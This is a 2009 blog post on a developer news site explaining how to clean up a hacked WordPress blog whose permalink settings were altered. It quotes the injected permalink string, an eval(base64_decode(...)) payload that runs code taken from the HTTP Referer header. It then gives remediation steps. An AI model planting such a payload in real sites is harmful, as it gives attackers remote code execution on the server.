Recent Articles

How To Rank High With SEO
Yesterday, Rand Fishkin, CEO of SEOMoz, announced that the SEOMoz team has released the results of their biennial Search Engine Ranking Factors for 2009. The data is based on the collective responses of 72...

Adding Digg And Facebook Support To Your Blog Site
If you're involved with social media sites like Digg, Facebbok or Reddit, you've probably seen stories with images next to them. If you've submitted...

Increasing Site Revenue With Better Keyword...
When you're running a blog with affiliate links, one of the key factors that can increase your conversions, help you make more sales, and ultimately put more...

Building A Consistent Mobile Representation...
One of the constant PITA experiences I have when using the web from a mobile device is the many websites you go to that aren't optimized for the small screen...


09.08.09

How To Correct Malformed WordPress Links

By Andrew Wee

I checked my blog and the URLs looked malformed, with the following structure:

http://www.whoisandrewwee.com/2009/09/03/
unlocking-unconventional-traffic-sources-for-affiliate-campaigns/
%&(%7B$%7Beval(base64_decode
($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929.

If you notice something similar or weird with your Wordpress blog, you might want to take the following steps:

• Check the "users" tab from the WP admin interface

• Remove any unfamiliar users, esp those marked as "administrator"

• To prevent users from registering, I'd go as far as to remove wp-register.php (keep a backup and FTP it back in if you have problems)

• Check all of Wordpress' PHP scripts, remove global "execute" privileges

Once you've secured the perimeter, look at the "Settings" and "permalinks" tab.

Earn Your Bachelor's Degree Online
in Internet Marketing - Click Here

If you see some weird stuff like

"%&(%7B$%7Beval(base64_decode
($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)
&%/#comment-506929?,

you'd want to clear that, and replace it with your original permalink structure, or look it up on the Wordpress codex.

You can also check out this other blog post for more details.

Note: this issue seems to be affecting Wordpress 2.6.x. Not sure to what extent it's affecting version 2.8.x.

UPDATE: Matt Mullenweg from the Wordpress development team has posted about the security issues if you're using an older version of Wordpress. Here's a WP support forum write up about what might be happening.

You might want to upgrade to a newer version of Wordpress. Just take note that some of your plugins/themes might not work if the developer hasn't updated the plugin for compliance with the newest version.

Comments

About the Author:
Andrew Wee is an Asia-based Internet Marketer focused on blogging, social traffic generation and affiliate marketing. Previously rated as one of Asia's top technology journalists, Andrew covers breaking news and industry developments at WhoIsAndrewWee.com
About DevWebProCanada
DevWebProCanada is for professional developers ... those who build and manage applications and sophisticated websites. DevWebProCanada delivers via news and expert advice New Strategies In Development.
iEntry





DevWebProCanada is brought to you by:

SecurityConfig.com NetworkingFiles.com
NetworkNewz.com WebProASP.com
DatabaseProNews.com SQLProNews.com
ITcertificationNews.com SysAdminNews.com
LinuxProNews.com WirelessProNews.com
CProgrammingTrends.com ITmanagementNews.com






-- DevWebProCA is an iEntry, Inc. publication --
iEntry, Inc. 2549 Richmond Rd. Lexington KY, 40509
2009 iEntry, Inc.  All Rights Reserved  Privacy Policy  Legal 

archives | advertising info | news headlines | free newsletters | comments/feedback | submit article